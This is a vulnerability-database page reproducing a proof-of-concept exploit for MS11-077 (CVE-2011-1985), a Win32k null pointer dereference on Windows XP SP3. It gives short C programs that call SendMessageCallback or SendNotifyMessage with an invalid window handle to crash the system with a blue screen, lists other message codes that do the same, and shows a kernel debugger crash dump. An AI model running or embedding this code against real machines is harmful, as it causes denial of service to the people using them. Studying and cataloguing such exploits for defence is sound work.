Vulners
Lucene search
Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | MS11-077 Win32k Null Pointer De-reference Vulnerability POC | 22 Oct 201100:00 | – | zdt |
 | CVE-2011-1985 | 23 Oct 201100:00 | – | circl |
 | CVE-2011-1985 | 12 Oct 201101:00 | – | cve |
 | CVE-2011-1985 | 12 Oct 201101:00 | – | cvelist |
 | EUVD-2011-1979 | 7 Oct 202500:30 | – | euvd |
 | Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077) | 23 Oct 201100:00 | – | exploitpack |
 | CVE-2011-1985 | 12 Oct 201102:52 | – | nvd |
 | Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) | 12 Oct 201100:00 | – | openvas |
| Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) | 12 Oct 201100:00 | – | openvas |
 | Null pointer dereference | 12 Oct 201102:52 | – | prion |
10
# Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
# Date: 10/19/2011
# Author: KiDebug
# Version: Windows XP SP3 32bit
# Tested on: Windows XP SP3 32bit
# CVE : CVE-2011-1985
# Exploit Code. Only a single line of code can cause BSOD:
#include <Windows.h>
void main()
{
SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);
}
or:
#include <Windows.h>
void main()
{
SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);
}
Those messages can aslo cause BSOD:
// CB_ADDSTRING 0x0143
// CB_INSERTSTRING 0x014A
// CB_FINDSTRING 0x014C
// CB_SELECTSTRING 0x014D
// CB_FINDSTRINGEXACT 0x0158
// LB_ADDSTRING 0x0180
// LB_INSERTSTRING 0x0181
// LB_SELECTSTRING 0x018C
// LB_FINDSTRING 0x018F
// LB_FINDSTRINGEXACT 0x01A2
// LB_INSERTSTRINGUPPER 0x01AA
// LB_INSERTSTRINGLOWER 0x01AB
// LB_ADDSTRINGUPPER 0x01AC
// LB_ADDSTRINGLOWER 0x01AD
0: kd> r
eax=0000001b ebx=ee0af1fa ecx=ffffffff edx=bbdd0650 esi=ffffffff edi=ee21fd64
eip=bf914e9b esp=ee21fd08 ebp=ee21fd08 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
win32k!NtUserfnINCBOXSTRING+0x8:
bf914e9b 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=????????
0: kd> kp
ChildEBP RetAddr
ee21fd08 bf80ef2b win32k!NtUserfnINCBOXSTRING+0x8
ee21fd40 8054261c win32k!NtUserMessageCall+0xae
ee21fd40 7c92e4f4 nt!KiFastCallEntry+0xfc
0012ff2c 77d194be ntdll!KiFastSystemCallRet
0012ff5c 00401015 USER32!NtUserMessageCall+0xc
0012ff78 0040114c 1!main(void)+0x15 [[r:\temp\1\1.cpp @ 6]
0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
0012fff0 00000000 kernel32!BaseProcessStart+0x23Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Oct 2011 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 27.2
CVSS 3.17.1
EPSS0.03372
SSVC